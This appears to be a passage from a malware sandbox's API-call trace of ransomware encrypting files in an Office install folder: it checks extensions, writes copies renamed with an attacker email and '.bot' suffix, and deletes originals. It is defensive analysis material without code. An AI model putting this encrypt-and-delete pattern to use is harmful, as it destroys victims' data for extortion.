	[0149.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.504] lstrlenW (lpString=".jpg") returned 4
	[0149.504] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.505] lstrcmpiW (lpString1=".HOL", lpString2=".bot") returned 1
	[0149.505] lstrlenW (lpString="OUTLOOK.HOL") returned 11
	[0149.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hol"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.505] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1287548) returned 1
	[0149.505] CloseHandle (hObject=0x3dc) returned 1
	[0149.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hol")) returned 0x20
	[0149.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hol.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hol"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.506] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.506] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hol.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.506] GetLastError () returned 0x0
	[0149.506] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0149.563] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0149.581] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x3a58c, lpOverlapped=0x0) returned 1
	[0149.594] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x3a590, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x3a590, lpOverlapped=0x0) returned 1
	[0149.636] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.636] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0149.636] SetEndOfFile (hFile=0x384) returned 1
	[0149.636] CloseHandle (hObject=0x384) returned 1
	[0149.636] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.637] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.666] CloseHandle (hObject=0x3dc) returned 1
	[0149.667] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.826] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hol")) returned 1
	[0149.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.827] lstrlenW (lpString=".doc") returned 4
	[0149.827] lstrcmpiW (lpString1=".doc", lpString2=".HOL") returned -1
	[0149.827] lstrlenW (lpString=".docx") returned 5
	[0149.827] lstrcmpiW (lpString1=".docx", lpString2="K.HOL") returned -1
	[0149.827] lstrlenW (lpString=".pdf") returned 4
	[0149.827] lstrcmpiW (lpString1=".pdf", lpString2=".HOL") returned 1
	[0149.827] lstrlenW (lpString=".xls") returned 4
	[0149.827] lstrcmpiW (lpString1=".xls", lpString2=".HOL") returned 1
	[0149.827] lstrlenW (lpString=".xlsx") returned 5
	[0149.827] lstrcmpiW (lpString1=".xlsx", lpString2="K.HOL") returned -1
	[0149.827] lstrlenW (lpString=".ppt") returned 4
	[0149.827] lstrcmpiW (lpString1=".ppt", lpString2=".HOL") returned 1
	[0149.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.827] lstrlenW (lpString=".zip") returned 4
	[0149.827] lstrcmpiW (lpString1=".zip", lpString2=".HOL") returned 1
	[0149.827] lstrlenW (lpString=".rar") returned 4
	[0149.827] lstrcmpiW (lpString1=".rar", lpString2=".HOL") returned 1
	[0149.827] lstrlenW (lpString=".bz2") returned 4
	[0149.827] lstrcmpiW (lpString1=".bz2", lpString2=".HOL") returned -1
	[0149.827] lstrlenW (lpString=".7z") returned 3
	[0149.827] lstrcmpiW (lpString1=".7z", lpString2="HOL") returned -1
	[0149.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.828] lstrlenW (lpString=".dbf") returned 4
	[0149.828] lstrcmpiW (lpString1=".dbf", lpString2=".HOL") returned -1
	[0149.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.828] lstrlenW (lpString=".1cd") returned 4
	[0149.828] lstrcmpiW (lpString1=".1cd", lpString2=".HOL") returned -1
	[0149.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.828] lstrlenW (lpString=".jpg") returned 4
	[0149.828] lstrcmpiW (lpString1=".jpg", lpString2=".HOL") returned 1
	[0149.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.828] lstrlenW (lpString=".doc") returned 4
	[0149.828] lstrcmpiW (lpString1=".doc", lpString2=".HOL") returned -1
	[0149.828] lstrlenW (lpString=".docx") returned 5
	[0149.828] lstrcmpiW (lpString1=".docx", lpString2="K.HOL") returned -1
	[0149.828] lstrlenW (lpString=".pdf") returned 4
	[0149.828] lstrcmpiW (lpString1=".pdf", lpString2=".HOL") returned 1
	[0149.828] lstrlenW (lpString=".xls") returned 4
	[0149.828] lstrcmpiW (lpString1=".xls", lpString2=".HOL") returned 1
	[0149.828] lstrlenW (lpString=".xlsx") returned 5
	[0149.828] lstrcmpiW (lpString1=".xlsx", lpString2="K.HOL") returned -1
	[0149.828] lstrlenW (lpString=".ppt") returned 4
	[0149.828] lstrcmpiW (lpString1=".ppt", lpString2=".HOL") returned 1
	[0149.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.828] lstrlenW (lpString=".zip") returned 4
	[0149.828] lstrcmpiW (lpString1=".zip", lpString2=".HOL") returned 1
	[0149.828] lstrlenW (lpString=".rar") returned 4
	[0149.828] lstrcmpiW (lpString1=".rar", lpString2=".HOL") returned 1
	[0149.828] lstrlenW (lpString=".bz2") returned 4
	[0149.828] lstrcmpiW (lpString1=".bz2", lpString2=".HOL") returned -1
	[0149.828] lstrlenW (lpString=".7z") returned 3
	[0149.828] lstrcmpiW (lpString1=".7z", lpString2="HOL") returned -1
	[0149.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.829] lstrlenW (lpString=".dbf") returned 4
	[0149.829] lstrcmpiW (lpString1=".dbf", lpString2=".HOL") returned -1
	[0149.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.829] lstrlenW (lpString=".1cd") returned 4
	[0149.829] lstrcmpiW (lpString1=".1cd", lpString2=".HOL") returned -1
	[0149.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HOL") returned 59
	[0149.829] lstrlenW (lpString=".jpg") returned 4
	[0149.829] lstrcmpiW (lpString1=".jpg", lpString2=".HOL") returned 1
	[0149.829] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0149.829] lstrlenW (lpString="PJINTLC.DLL") returned 11
	[0149.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintlc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.834] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=154496) returned 1
	[0149.834] CloseHandle (hObject=0x384) returned 1
	[0149.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintlc.dll")) returned 0x20
	[0149.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintlc.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pjintlc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.839] lstrlenW (lpString=".doc") returned 4
	[0149.839] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.839] lstrlenW (lpString=".docx") returned 5
	[0149.839] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0149.839] lstrlenW (lpString=".pdf") returned 4
	[0149.839] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.839] lstrlenW (lpString=".xls") returned 4
	[0149.839] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.839] lstrlenW (lpString=".xlsx") returned 5
	[0149.839] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0149.839] lstrlenW (lpString=".ppt") returned 4
	[0149.839] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.839] lstrlenW (lpString=".zip") returned 4
	[0149.839] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.839] lstrlenW (lpString=".rar") returned 4
	[0149.839] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.839] lstrlenW (lpString=".bz2") returned 4
	[0149.839] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.839] lstrlenW (lpString=".7z") returned 3
	[0149.839] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.840] lstrlenW (lpString=".dbf") returned 4
	[0149.840] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.840] lstrlenW (lpString=".1cd") returned 4
	[0149.840] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.840] lstrlenW (lpString=".jpg") returned 4
	[0149.840] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.840] lstrlenW (lpString=".doc") returned 4
	[0149.840] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.840] lstrlenW (lpString=".docx") returned 5
	[0149.840] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0149.840] lstrlenW (lpString=".pdf") returned 4
	[0149.840] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.840] lstrlenW (lpString=".xls") returned 4
	[0149.840] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.840] lstrlenW (lpString=".xlsx") returned 5
	[0149.840] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0149.840] lstrlenW (lpString=".ppt") returned 4
	[0149.840] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.840] lstrlenW (lpString=".zip") returned 4
	[0149.840] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.840] lstrlenW (lpString=".rar") returned 4
	[0149.840] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.840] lstrlenW (lpString=".bz2") returned 4
	[0149.840] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.840] lstrlenW (lpString=".7z") returned 3
	[0149.841] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.841] lstrlenW (lpString=".dbf") returned 4
	[0149.841] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.841] lstrlenW (lpString=".1cd") returned 4
	[0149.841] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PJINTLC.DLL") returned 59
	[0149.841] lstrlenW (lpString=".jpg") returned 4
	[0149.841] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.841] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0149.841] lstrlenW (lpString="PMENURES.DLL") returned 12
	[0149.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pmenures.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.844] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=10624) returned 1
	[0149.844] CloseHandle (hObject=0x384) returned 1
	[0149.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pmenures.dll")) returned 0x20
	[0149.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pmenures.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pmenures.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.845] lstrlenW (lpString=".doc") returned 4
	[0149.845] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.845] lstrlenW (lpString=".docx") returned 5
	[0149.845] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0149.845] lstrlenW (lpString=".pdf") returned 4
	[0149.845] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.845] lstrlenW (lpString=".xls") returned 4
	[0149.845] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.845] lstrlenW (lpString=".xlsx") returned 5
	[0149.845] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0149.846] lstrlenW (lpString=".ppt") returned 4
	[0149.846] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.846] lstrlenW (lpString=".zip") returned 4
	[0149.846] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.846] lstrlenW (lpString=".rar") returned 4
	[0149.846] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.846] lstrlenW (lpString=".bz2") returned 4
	[0149.846] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.846] lstrlenW (lpString=".7z") returned 3
	[0149.846] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.846] lstrlenW (lpString=".dbf") returned 4
	[0149.846] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.846] lstrlenW (lpString=".1cd") returned 4
	[0149.846] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.846] lstrlenW (lpString=".jpg") returned 4
	[0149.846] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.846] lstrlenW (lpString=".doc") returned 4
	[0149.846] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.846] lstrlenW (lpString=".docx") returned 5
	[0149.846] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0149.846] lstrlenW (lpString=".pdf") returned 4
	[0149.846] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.846] lstrlenW (lpString=".xls") returned 4
	[0149.846] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.847] lstrlenW (lpString=".xlsx") returned 5
	[0149.847] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0149.847] lstrlenW (lpString=".ppt") returned 4
	[0149.847] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.847] lstrlenW (lpString=".zip") returned 4
	[0149.847] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.847] lstrlenW (lpString=".rar") returned 4
	[0149.847] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.847] lstrlenW (lpString=".bz2") returned 4
	[0149.847] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.847] lstrlenW (lpString=".7z") returned 3
	[0149.847] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.847] lstrlenW (lpString=".dbf") returned 4
	[0149.847] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.847] lstrlenW (lpString=".1cd") returned 4
	[0149.847] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PMENURES.DLL") returned 60
	[0149.847] lstrlenW (lpString=".jpg") returned 4
	[0149.847] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.847] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0149.847] lstrlenW (lpString="POWERPNT.DEV.HXS") returned 16
	[0149.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.848] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=5042788) returned 1
	[0149.848] CloseHandle (hObject=0x384) returned 1
	[0149.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev.hxs")) returned 0x20
	[0149.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0149.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.848] lstrlenW (lpString=".doc") returned 4
	[0149.848] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.849] lstrlenW (lpString=".docx") returned 5
	[0149.849] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0149.849] lstrlenW (lpString=".pdf") returned 4
	[0149.849] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.849] lstrlenW (lpString=".xls") returned 4
	[0149.849] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.849] lstrlenW (lpString=".xlsx") returned 5
	[0149.849] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0149.849] lstrlenW (lpString=".ppt") returned 4
	[0149.849] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.849] lstrlenW (lpString=".zip") returned 4
	[0149.849] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.849] lstrlenW (lpString=".rar") returned 4
	[0149.849] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.849] lstrlenW (lpString=".bz2") returned 4
	[0149.849] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.849] lstrlenW (lpString=".7z") returned 3
	[0149.849] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.849] lstrlenW (lpString=".dbf") returned 4
	[0149.849] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.849] lstrlenW (lpString=".1cd") returned 4
	[0149.849] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.849] lstrlenW (lpString=".jpg") returned 4
	[0149.849] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.850] lstrlenW (lpString=".doc") returned 4
	[0149.850] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.850] lstrlenW (lpString=".docx") returned 5
	[0149.850] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0149.850] lstrlenW (lpString=".pdf") returned 4
	[0149.850] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.850] lstrlenW (lpString=".xls") returned 4
	[0149.850] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.850] lstrlenW (lpString=".xlsx") returned 5
	[0149.850] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0149.850] lstrlenW (lpString=".ppt") returned 4
	[0149.850] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV.HXS") returned 64
	[0149.850] lstrlenW (lpString=".zip") returned 4
	[0149.850] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.850] lstrlenW (lpString=".rar") returned 4
	[0149.850] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.850] lstrlenW (lpString=".bz2") returned 4
	[0149.850] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.850] lstrlenW (lpString=".7z") returned 3
	[0149.850] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
